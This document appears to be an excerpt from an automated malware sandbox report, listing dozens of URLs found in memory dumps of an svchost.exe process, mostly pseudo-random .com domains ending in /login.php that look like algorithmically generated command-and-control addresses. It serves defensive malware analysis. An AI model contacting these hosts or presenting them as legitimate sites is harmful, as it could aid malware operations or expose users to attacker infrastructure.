    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447172965.000000000600D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufymoq.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyweq.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufywil.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxug.com/login.php
    Source: svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxyp.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybev.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyp.com/login.php
    Source: svchost.exe, 00000002.00000003.1715978327.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726087708.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxuq.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824832708.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546749994.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1829965352.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybeg.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydov.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559573077.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564225122.00000000029FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygyq.com/login.php
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106241770.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygyv.com/H
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjiq.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvylyg.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymug.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447172965.000000000600D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuq.com/login.php
    Source: svchost.exe, 00000002.00000002.2666485485.00000000061DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuv.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywal.com/login.php
    Source: svchost.exe, 00000002.00000003.1715978327.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726087708.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywav.com/
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywav.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybep.com/login.php
    Source: svchost.exe, 00000002.00000003.2035294688.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034558504.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023797256.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2026757064.00000000029C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/H
    Source: svchost.exe, 00000002.00000003.2035294688.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034558504.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023797256.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2026757064.00000000029C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/http://vowyqyt.com/H
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydog.com/
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydog.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/login.phpg
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755017.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722234012.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjoq.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2658895836.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/login.php
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymig.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypug.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078075418.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzytul.com/login.php
    Source: svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599945595.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600751317.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594414511.00000000029E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywuq.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxip.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885927315.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxyv.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562173607.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561263694.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhuq.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhuv.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykoq.com/login.php
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755017.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722234012.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylug.com/login.php
    Source: svchost.exe, 00000002.00000003.1660127247.0000000003A2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylyp.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546749994.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebynyg.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqig.com/login.php
